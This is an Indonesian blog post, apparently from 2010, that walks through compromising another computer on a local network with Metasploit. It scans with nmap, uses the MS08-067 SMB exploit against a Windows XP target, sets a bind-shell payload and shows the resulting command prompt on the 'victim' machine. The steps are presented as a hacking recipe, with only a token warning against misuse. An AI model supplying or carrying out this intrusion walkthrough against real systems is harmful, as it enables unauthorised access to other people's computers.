framework
Posted by neokiddy on 13 March, 2010
7 Comments
This item was filled under [ Exploit ]
Semalam neo dah praktek sekarang giliran deh neo buat ngeshare
Kelebihan yg paling neo senang dari tool ini kita nggak perlu harus melakukan sentuhan fisik
terhadap komputer target victim
Neo bakal kasi tau gimana cara meng-exploit komputer lain dalam satu jaringan. dengan
menggunakan Metasploit Framework (msf), kali ini neo makek msf versi 3.3.3 yg dapat di
download disini :
http://www.metasploit.com/framework/download/
Install jg nmapnya yah, nmap sudah sudah tersedia dalam satu paket dengan msf 3.3.3
Buka metasploit console, bagi komputer kalian yg masi jadul kayak kompi neo
sabar dulu sampek muncul gambar kyk gini
Ada puluhan bahkan ratusan macam-macam exploit yang terkandung, neo cuman akan
menunjukkan salah satunya, untuk selanjutnya terserah kalian . Selanjutnya, kita tentukan
victim yang akan kita exploitasi, untuk toolnya gunakan ip scanner, silahkan cari di google
banyak
kemudian buka nmap, nmap berperan untuk scanning port yg terbuka, lihat gambar di
bawah :
masukkan ip target :
Untuk melihat dari opsi exploit ini gunakan perintah “show options” :
Dari opsi diatas kita perlu meng-set RHOST, perintahnya “set rhost ip target” :
Untuk RPORT, kita tidak tidak perlu meng-set karena jenis vulnerability ini mengexploitasi
jenis vulnerability pada port 445. Untuk exploit target kita gunakan OS komputer target. Dan
untuk melihat OS apa aja, ketik “show targets” :
Sekarang kita tentukan jenis payloadnya, kali ini neo menggunakan shell_tcp_bind,
perintahnya “set payload windows/shell_tcp_bind” :
Atau, untuk mengetahui payload apa aja dalam metasploit ketik “show payloads” (tanpa
tanda petik)
Nah, kita dah selesai untuk tahap konfigurasinya, untuk melihat hasil konfigurasinya ketik
“show options” :
Ups, neh tahap yg Neo suka….ssst. ketik “exploit” lalu tekan enter pelan-pelan…
Xixixixixi…..
Wakakakaakak, misi sukses…..dengan melihat gambar di atas terlihat neo dah berada pada
komputer victim…:-P, gak percaya….!!…coba ketik ipconfig :
well..well..well….untuk selanjutnya terserah kalian cukup neo ampek dsini aja..:-). Ingat,
tutorial ini jangan disalahgunakan eaa…
Core Commands
=============
Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
connect Communicate with a host
exit Exit the console
help Help menu
info Displays information about one or more module
irb Drop into irb scripting mode
jobs Displays and manages jobs
load Load a framework plugin
loadpath Searches for and loads modules from a path
quit Exit the console
resource Run the commands stored in a file
route Route traffic through a session
save Saves the active datastores
search Searches module names and descriptions
sessions Dump session listings and display information about
sessions
set Sets a variable to a value
setg Sets a global variable to a value
show Displays modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
unload Unload a framework plugin
unset Unsets one or more variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers
Untuk melihat list exploits-nya , gunakan perintah :
List seluruh exploit yang ada kira-kira seperti ini (saya paste sebagian saja biar ndak terlalu
panjang) :
Scan mesin target menggunakan nmap. Dalam contoh kasus kali ini kita gunakan kompi dg ip
192.168.1.28 :
Dari hasil scan kita ketahui bahwa kemungkinan OS-nya menggunakan OS Windows XP
dengan port 445-nya terbuka. Mari kita coba kompi ini dengan menggunakan exploit
windows/smb/ms08_067_netapi.
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER,
SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
Dari opsi diatas, maka kita perlu set terlebih dahulu RHOST ( komputer target) dengan
mengetikkan :
Untuk RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability ini memang
mengeksploitasi vulnerability di port 445. Untuk exploit target diisi dengan OS komputer
target. Dalam langkah ini kita menggunakan angka 0 yang berarti automatic target. Untuk
melihat OS target apa saja, ketik :
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
-------- cut -----------
Sekarang kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini saya ingin
menggunakan tcp_bind shell (akses command prompt di kompi target) :
Compatible payloads
===================
Name Description
---- -----------
generic/debug_trap Generic x86 Debug Trap
generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP
Stager (IPv6)
generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP
Stager (No NX Support)
generic/debug_trap/bind_tcp Generic x86 Debug Trap, Bind TCP
Stager
----------- dipotong sampai disini ---------------
Nahh.. setting sudah selesai dilakukan. Untuk melihat hasil konfigurasinya bisa dicek
kembali dengan menggunakan show options :
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.28 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER,
SRVSVC)
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
C:\WINDOWS\system32>
Metasploit : msfcli
Dari langkah-langkah diatas… sebenarnya bisa dilakukan exploitasi dengan menggunakan
satu perintah dari console, dan diakomodir dengan menggunakan msfcli yang notabene
sebenarnya adalah metasploit command line interface.
Untuk melihat manual perintahnya bisa dilihat dari help maupun manpage-nya wiki-nya
metasploit.
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.28
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.254
C:\WINDOWS\system32>
Implementasi yang sama juga bisa dilakukan pada metasploit GUI (msfgui) dan metasploit berbasis
web (msfweb). Silahkan dicoba sendiri karena saya malas upload gambarnya :-p. Dari teknik dasar ini
silahkan dikembangkan dengan teknik-teknik yang lain.